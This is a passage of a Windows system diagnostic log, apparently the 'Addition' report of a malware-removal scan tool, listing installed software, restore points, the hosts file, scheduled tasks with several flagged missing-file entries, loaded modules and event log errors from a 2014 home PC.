 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden
6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) Hidden
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)
Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) Hidden
ActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)
Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)
Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)
Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)
Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )
AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)
AVG 2011 (Version: 10.0.1388 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1390 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1391 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1392 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1410 - AVG Technologies) Hidden
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan (Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) Hidden
Browser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)
BufferChm (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Catalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) Hidden
CCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help English (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help French (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help German (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Italian (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Korean (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Polish (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Thai (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hidden
ccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hidden
ccc-utility (Version: 2007.0731.2234.38497 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)
Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)
Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)
Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)
Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)
Destination Component (Version: 110.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) Hidden
DocMgr (Version: 120.0.000.000 - Hewlett-Packard) Hidden
DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
Fax (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Feedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)
Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)
GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)
HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)
HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)
HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)
HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)
HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)
HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HPSSupply (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)
iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)
iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)
Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) Hidden
MediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)
Network (Version: 120.0.194.000 - Hewlett-Packard) Hidden
OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)
PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)
ProductContext (Version: 50.0.165.000 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )
Roxio Creator Audio (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Copy (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Data (Version: 3.7.0 - Roxio) Hidden
Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)
Roxio Creator DE (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Tools (Version: 3.7.0 - Roxio) Hidden
Roxio Express Labeler 3 (Version: 3.2.1 - Roxio) Hidden
Roxio Update Manager (Version: 6.0.0 - Roxio) Hidden
SAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)
SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)
SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) Hidden
Scan (Version: 12.0.0.0 - Hewlett-Packard) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)
Skins (Version: 2007.0731.2234.38497 - ATI) Hidden
SmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) Hidden
SolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Status (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Toolbox (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Transporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)
TrayApp (Version: 120.0.194.000 - Hewlett-Packard) Hidden
UnloadSupport (Version: 11.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version:  - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)
WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
 
==================== Restore Points  =========================
 
29-07-2014 11:25:23 Scheduled Checkpoint
30-07-2014 11:45:57 Scheduled Checkpoint
01-08-2014 21:10:36 Scheduled Checkpoint
02-08-2014 16:42:56 Scheduled Checkpoint
04-08-2014 04:00:03 Scheduled Checkpoint
07-08-2014 22:48:19 Scheduled Checkpoint
11-08-2014 02:11:41 Scheduled Checkpoint
11-08-2014 15:01:42 Scheduled Checkpoint
12-08-2014 10:45:08 Scheduled Checkpoint
14-08-2014 02:36:25 Scheduled Checkpoint
14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14  17:59
14-08-2014 23:31:34 Advanced-System Protector
15-08-2014 23:47:04 Removed SofTest
16-08-2014 13:18:06 Removed DriverUpdate
16-08-2014 13:29:10 Removed HTC Sync.
16-08-2014 13:44:46 Removed HTC Sync.
16-08-2014 14:02:17 Removed HTC BMP USB Driver.
16-08-2014 16:47:50 Advanced-System Protector
16-08-2014 21:58:06 Installed AVG 2014
16-08-2014 22:11:41 Removed SlimCleaner Plus
16-08-2014 22:14:50 Removed HTC Driver Installer.
17-08-2014 19:56:09 Installed AVG 2014
17-08-2014 19:59:04 Installed AVG 2014
17-08-2014 20:03:04 Removed AVG 2014
17-08-2014 20:04:51 Installed AVG 2011
17-08-2014 21:08:16 Installed AVG 2014
17-08-2014 21:16:20 Installed AVG 2014
17-08-2014 21:24:43 Removed AVG 2014
17-08-2014 21:26:10 Installed AVG 2011
19-08-2014 21:04:48 Advanced-System Protector
21-08-2014 01:40:12 Advanced-System Protector
23-08-2014 20:47:11 Checkpoint by HitmanPro
26-08-2014 12:19:57 Removed AVG 2011
26-08-2014 12:22:43 Removed AVG 2011
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-08-23 14:19 - 2014-08-26 09:28 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)
Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION
Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - \Security Center Update - 754758581 No Task File <==== ATTENTION
Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe
Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)
Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - \Time Trigger Test Task No Task File <==== ATTENTION
Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe
Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe
Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)
Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION
Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)
Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)
Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - \{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} No Task File <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll
2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll
2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll
2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll
2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll
2012-05-16 21:52 - 2011-01-04 15:34 - 04545024 _____ () C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
2012-05-16 21:52 - 2009-08-28 16:50 - 00282624 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvcLib.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
==================== Faulty Device Manager Devices =============
 
Name: Microsoft 6to4 Adapter #2
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/26/2014 02:05:12 PM) (Source: Perflib) (EventID: 1010) (User: )
Description: EmdCacheC:\Windows\system32\emdmgmt.dll4
 
Error: (08/26/2014 09:27:53 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (08/26/2014 08:25:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application iexplore.exe, version 0.0.0.0, time stamp 0x4e06cfe8, faulting module iexplore.exe, version 0.0.0.0, time stamp 0x4e06cfe8, exception code 0x40000015, fault offset 0x0008d1c0,
process id 0x17d4, application start time 0xiexplore.exe0.
 
Error: (08/26/2014 08:02:57 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_2584_29457\CRX_INSTALL\_LOCALES\ES_419\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/26/2014 08:02:49 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/26/2014 08:02:26 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\INDEX> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/26/2014 08:02:26 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_3> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/26/2014 08:02:26 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_2> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/26/2014 08:02:26 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_1> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
